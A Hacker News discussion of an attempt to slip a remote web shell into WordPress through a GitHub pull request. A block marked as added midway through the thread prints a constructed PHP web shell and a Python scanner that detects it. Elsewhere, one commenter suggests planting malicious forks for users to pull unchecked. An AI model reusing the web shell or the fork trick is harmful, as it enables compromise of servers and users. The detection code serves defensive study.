
Attempt to hack WordPress with a pull request - alpb
https://github.com/wordpress/wordpress/pull/18
======
ck2
WP has absolutely no room to be making fun of security issues.

They caught this one because it was an obvious attempt, but their track
history sucks.

Mocking evil hackers is a very stupid idea.

Oh and I believe they tried this because someone was successful in the past if
I remember correctly.

~~~
scribu
> Mocking evil hackers is a very stupid idea.

So, every script kiddie is an "evil hacker" now?

> Oh and I believe they tried this because someone was successful in the past
> if I remember correctly.

Source?

~~~
ck2
At least one incident here, my memory is clouded by all the issues over the
years:

[http://it.slashdot.org/story/11/06/22/1241241/wordpressorg-h...](http://it.slashdot.org/story/11/06/22/1241241/wordpressorg-hacked-plugin-repository-compromised)

~~~
scribu
Thanks for the link, but inserting commits by hacking the infrastructure isn't
quite the same as having a pull request officially merged.

Even the Linux infrastructure was hacked not too long ago. More such examples
here: <https://news.ycombinator.com/item?id=4464303>

------
kevinconroy
Nothing subtle, but he was clever in the sense that he managed to stuff a
complete injection attack into his single file and included a Google-call in
case his script didn't recognize the operating system.

Worth a read not because it's a genius-level hack, but to see the
breadth-first attempt that the attack takes to utilize a number of strategies.
Realizing the number of attack vectors that you have to defend against is key
to writing secure code.

In that sense, I wonder if there are other good examples of attack code hosted
on github somewhere. Seems like there's as much to learn from "black hat" code
attacks as there is from doing code reviews on your own codebase.

~~~
TazeTSchnitzel
It's cool and all, but I get the feeling that the pull requester probably
didn't write the code.

------
zoul
Sweet Jesus the discussion under the request looks like MySpace. I sincerely
hope that this isn't going to be the norm on GitHub in the future.

~~~
callahad
It's already pretty common on any issue or pull request that gets a lot of
attention and has an aspect of community drama. The Crockford / semicolon one
isn't _as_ bad straight out of the gate
(<https://github.com/twitter/bootstrap/issues/3057>), but still...

~~~
pooriaazimi
That thread's been modified _heavily_ since then. And I mean heavily. The
first 300 posts were all memes back then.

------
DigitalSea
Very clever but given Wordpress's security track record when it comes to code
exploits I wouldn't have been surprised if this somehow made its way into the
core. Good code for learning how some particular Wordpress exploits work.

~~~
pervycreeper
Are you saying that someone who hasn't read the complete source code of all
the software he uses is a moron?

~~~
pervycreeper
Oops, meant to reply to <http://news.ycombinator.com/item?id=4464955>

------
nyodeneD
Are there any examples of hackers successfully inserting exploits into a
popular codebase like this?

~~~
nl
There was the famous attempt to insert a backdoor in the Linux source tree[1].
That wasn't quite the same, as it wasn't a pull request (or equivalent), but was
instead done by directly modifying the CVS mirror of the BitKeeper source tree.

[1] [http://lkml.indiana.edu/hypermail/linux/kernel/0311.0/0621.h...](http://lkml.indiana.edu/hypermail/linux/kernel/0311.0/0621.html)

------
tjdetwiler
I was expecting something subtle and clever.

------
cheap
Instead of focusing on the pull request maybe we should think about better
vulnerability trajectories. Next time don't make a pull request. Just fork the
project, add some dumb feature someone will want or need, then leave your fork
out there on Github. Morons will pull it down and use it without ever checking
the code.

------
ohashi
So he just put in a remote shell and removed the actual code? I've found a
couple of remote shell scripts on my server over the years as it got
compromised; I was always impressed with how much they could really do from one
file to my server. Scary stuff.
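A defender-side illustration of spotting that kind of single-file remote shell, added here and not part of the thread or of the pull request: both PHP samples are constructed, and the indicator list is a heuristic assumption rather than a complete rule set. It also decodes base64 string literals so that a partly obfuscated payload is scanned along with the plain source.

```python
import base64
import re

# Constructed one-file PHP web shell (not the pull request's code): $_POST input
# reaches a command shell, partly hidden behind eval() of a base64 payload.
SAMPLE_SHELL = r'''<?php
$k = $_POST["cmd"];
@eval(base64_decode("c3lzdGVtKCRrKTs="));
$out = stripos(PHP_OS, "WIN") === 0 ? shell_exec($k) : `$k`;
echo "<pre>$out</pre>";
'''
# Constructed benign snippet for comparison.
SAMPLE_CLEAN = r'''<?php
function example_title( $title ) {
    return esc_html( $title );
}
'''
# Heuristic indicators (an assumption, not an exhaustive rule set).
INDICATORS = {
    "exec_call": re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(', re.I),
    "eval_call": re.compile(r'\beval\s*\(', re.I),
    "backtick_exec": re.compile(r'`[^`\n]*\$[^`\n]*`'),
    "request_input": re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b'),
    "decoder_call": re.compile(r'\b(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(', re.I),
}
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')

def decode_literals(src):
    """Decode base64-looking string literals so an obfuscated payload is scanned too."""
    out = []
    for lit in B64_LITERAL.findall(src):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def scan_php(src):
    """Return the indicator names present in src or in its decoded literals."""
    found = set()
    for text in [src] + decode_literals(src):
        found.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return found

def is_web_shell(src):
    """Flag: a code-execution primitive fed by request input, or eval() of a decoded blob."""
    f = scan_php(src)
    runs_code = bool(f & {"exec_call", "eval_call", "backtick_exec"})
    return (runs_code and "request_input" in f) or {"eval_call", "decoder_call"} <= f
```

Running `scan_php` over files in a web root and reviewing anything `is_web_shell` flags is a triage aid, not a verdict; legitimate plugins can use `eval` or `exec`, so the hits still need a human read.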

------
adrinavarro
<https://github.com/maxymax> I'm quite intrigued by his profile. Note the
'10,000 commits with 255,815 additions and 29,562 deletions'.

~~~
alpb
Oh God, how could anyone possibly do 10,000 commits on a single file?

~~~
duskwuff
Not sure, but possibly by attempting to insert a malicious commit into the
history and rebase everything else over it.

~~~
Shank
That would be this pull request he sent:

<https://github.com/WordPress/WordPress/pull/19>

------
ibotty
The pull request seems to be deleted. People who want to have a look at
the (partly not yet obfuscated) commit will want to search for the SHA

2fa93590c7881fab043be7b8b51358894dbc1466

------
keithburgun
Could someone explain this joke to me, a total programming noob?

~~~
TazeTSchnitzel
They made a pull request - which basically means a request to change the
source code - to insert a huge hacker console into wp.

~~~
kghose
Thanks. I'm with parent and very curious about what this is about. Does this
console give root access to the server via a web interface?

~~~
OtisBoxcar
Sort of. It gives access with whatever user the webserver is running under.
Might be root, but will usually be a less privileged user, e.g. www-data.

------
newobj
Laugh now, but someone will pull it off one day.

------
Gamefoo
"An hilarious", really? Dude, spend a minute on your title. It's not Reddit
here.

~~~
jameyc
That's actually correct - 'an' before a sounded 'h' is a style issue in
American English, and still commonly used. In nearly every other English
dialect it is a strict rule.

~~~
ajhit406
Yeah I was just going to comment on this too-- "a" vs. "an" actually has to do
with pronunciation, not strictly words that begin with vowels.

Maybe the author is Irish =)

------
homakov
I'm envious. Smart hack.

